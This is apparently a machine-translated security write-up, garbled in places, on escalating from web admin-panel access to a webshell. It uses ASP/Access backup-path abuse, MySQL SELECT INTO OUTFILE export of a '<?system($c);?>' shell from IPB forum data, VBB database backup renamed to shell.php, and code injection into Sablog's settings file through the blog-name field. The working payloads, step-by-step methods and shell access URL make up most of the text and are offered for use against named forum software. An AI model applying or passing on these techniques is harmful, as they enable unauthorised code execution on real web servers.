A bit of thinking from backstage to Webshell--vulnerability research

The main use of the background of the Access database "backup Database" or "RESTORE Database" function, "Backup database path" and other variables do not filter results can be arbitrary file suffix to ASP, so that the Webshell,msssql version of the program directly applied Access version of the code, Causes the SQL version to be available. Specific methods and analysis can refer to Angel's article "Dynamic Network Forum 7.0 to obtain Webshell analysis." As far as I know, there are a lot of ASP programs in the background there are such vulnerabilities, the use of similar methods.
Php+mysql Program
① use the Backstage data query function
In some programs backstage provides directly to the MySQL data query function, we can use it to execute SELECT ... into outfile query output PHP file, because all the data is stored in MySQL, so we can through the normal means to insert our Webshell code mysql in the use of select ... Into the OUTFILE statement to export the shell. Here we use the IPB forum to do a demo:
The first step: write our Webshell code to the database
Just find a place to write (pay attention to your input to do not filter), here we use the new background to build a forum, in the forum description to write our shell code <?system ($c);? > Submit ok so that our shell is written to the database.
Step Two: Export Webshell
We went to "SQL Management" in "MySQL Toolbox" in "Run Query" to write statements:
SELECT * from 123forums to outfile ' d:\shell.php '

Shell code in the table, the Web directory absolute path, if the host MySQL query success, we will get our Webshell:
Http://127.0.0.1/test/shell.php?c=dir

② use MySQL data standby
Thinking in combination with the above 2 kinds of cases, some programs in the standby database on the type of standby file is not limited to export PHP files, we and ①, by writing Webshell code into the database, in the use of data backup export Webshell, We are familiar with the VBB forum can use this method to get Webshell, we set the user's signature for <?system ($c);? > then to the background of the database backup, in the "Back Up database to file on the server" to shell.php, submitted to save. We can access our shell at the root of the forum, because the files may be larger and we can change the Webshell code to generate the file.
Supplementary ideas
Using the Web background system settings, if the system setup is saved in the php/asp file, we can write the Webshell code to save the php/asp file in the setup.
Demonstrate
The basic settings of the program Sablog,sablog are saved in admin\settings.php because the background is not filtered in the commit set of variables ten, causing us to write arbitrary code to admin\settings.php.
Go backstage--"Basic settings"--"blog name" (Other items can also)--fill in the code: SSS ";p hpinfo ();" SS--Submit.
So we write the phpinfo () to admin\settings.php, and we can see the admin\settings.php display the PHP information normally.
Summary
The above is a demo of systems such as PHP, also suitable for other systems such as ASP (such as power, cloud download, etc.). Just be careful when writing code, and if the code is wrong, it can cause the entire web system to be paralyzed.
There is also a use of uploading the vulnerability of this is not to say hehe: